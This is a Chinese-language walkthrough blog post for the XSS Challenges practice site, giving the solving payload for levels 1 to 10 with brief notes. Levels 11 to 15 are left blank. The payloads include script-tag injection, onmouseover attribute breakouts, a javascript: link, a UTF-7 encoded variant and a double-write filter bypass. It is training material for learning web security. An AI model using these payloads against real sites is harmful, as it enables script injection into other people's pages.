XSS Challenges通关笔记

xss-quiz.int21h.jp平台

1

<script>alert(document.domain);</script>

2

 "><script>alert(document.domain);</script>

自此以下使用工具传递参数避免被编码

3

<script>alert(document.domain);</script>

注入点在p2参数回显上

4

"><script>alert(document.domain);</script>

注入点在p3参数的回显上

5

"><script>alert(document.domain);</script>

水题

6

" onmouseover=alert(document.domain) class="a

参数被转义故使用事件触发

7

" onmouseover=alert(document.domain) "

与第六关一样

8

javascript:alert(document.domain);

填入链接自动生成a标签url 因为过滤了尖括号等构造伪协议点击触发
javascript:表示触发默认动作时，执行一段JavaScript代码

9

raw:  " onmouseover=alert(document.domain)>
utf-7:  +/v8 +ACI- onmouseover=alert(d+AG8AYw-u+AG0-en+AHQALg-d+AG8AbQBh-in)+AD4-

提交

复现

回显

仅IE浏览器支持UTF-7编码须在IE下测试

10

111"><script>alert(document.dodomainmain);</script>

双写绕过

11

12

13

14

15

参考链接：

©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成，浏览时请结合常识与多方信息审慎甄别。
平台声明：文章内容（如有图片或视频亦包括在内）由作者上传并发布，文章内容仅代表作者本人观点，简书系信息发布平台，仅提供信息存储服务。

XSS Challenges通关笔记

XSS Challenges通关笔记

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

相关阅读更多精彩内容

友情链接更多精彩内容